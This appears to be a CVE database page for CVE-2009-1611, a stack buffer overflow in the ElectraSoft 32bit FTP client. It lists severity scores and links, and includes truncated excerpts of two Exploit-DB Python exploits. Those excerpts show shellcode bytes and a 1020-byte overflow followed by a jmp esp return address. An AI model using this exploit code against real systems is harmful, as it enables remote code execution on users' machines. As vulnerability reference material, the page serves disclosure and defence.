CVE-2009-1611
published 2009-05-11CVE-2009-1611: Stack-based buffer overflow in ElectraSoft 32bit FTP 09.04.24 allows remote FTP servers to execute arbitrary code via a long 257 reply to a CWD command.
PriorityP353critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
7.19%
93.5th percentile
Stack-based buffer overflow in ElectraSoft 32bit FTP 09.04.24 allows remote FTP servers to execute arbitrary code via a long 257 reply to a CWD command.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| electrasoft | 32bit_ftp | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
32bit FTP (09.04.24) - 'CWD Response' Universal Overwrite (SEH)
exploitdb·2009-05-05
CVE-2009-1611 32bit FTP (09.04.24) - 'CWD Response' Universal Overwrite (SEH)
32bit FTP (09.04.24) - 'CWD Response' Universal Overwrite (SEH)
---
#!/usr/bin/python
# _ _ _ __ _ _ _
#| || | (_) ___ / \ | |__ | | |
#| __ | | | (_-< | () | | / / |_ _|
#|_||_| |_| /__/ \__/ |_\_\ |_|
#
#[*] Bug : 32bit FTP (09.04.24) (CWD Response) Universal Seh Overwrite Exploit
#[*] Refer : http://www.milw0rm.com/exploits/8611
#[*] Tested on : Xp sp3 (EN)(VB)
#[*] Exploited by : His0k4
#[*] Greetings : All friends & muslims HaCkErs (DZ),Algerians Elites,snakespc.com
#[*] Serra7 Merra7 koulchi mderra7 :p
from socket import *
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
shellcode=(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x
Exploit-DB
32bit FTP (09.04.24) - 'CWD Response' Remote Buffer Overflow
exploitdb·2009-05-05
CVE-2009-1611 32bit FTP (09.04.24) - 'CWD Response' Remote Buffer Overflow
32bit FTP (09.04.24) - 'CWD Response' Remote Buffer Overflow
---
#!/usr/bin/python
# _ _ _ __ _ _ _
#| || | (_) ___ / \ | |__ | | |
#| __ | | | (_-< | () | | / / |_ _|
#|_||_| |_| /__/ \__/ |_\_\ |_|
#
#[*] Bug : 32bit FTP (09.04.24) (CWD response) Remote Buffer Overflow Exploit
#[*] Refer : http://www.milw0rm.com/exploits/8611
#[*] Tested on : Xp sp3 (EN)(VB)
#[*] Exploited by : His0k4
#[*] Greetings : All friends & muslims HaCkErs (DZ),Algerians Elites,snakespc.com
#[*] Serra7 Merra7 koulchi mderra7 :p
from socket import *
payload = "\x41"*1020
payload += "\x67\x86\x86\x7C" # jmp esp kernel32.dll
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
payload += (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54
No writeups or analysis indexed.
http://www.securityfocus.com/bid/34822http://www.securityfocus.com/bid/34838http://www.vupen.com/english/advisories/2009/1263https://www.exploit-db.com/exploits/8613https://www.exploit-db.com/exploits/8621http://www.securityfocus.com/bid/34822http://www.securityfocus.com/bid/34838http://www.vupen.com/english/advisories/2009/1263https://www.exploit-db.com/exploits/8613https://www.exploit-db.com/exploits/8621
2009-05-11
Published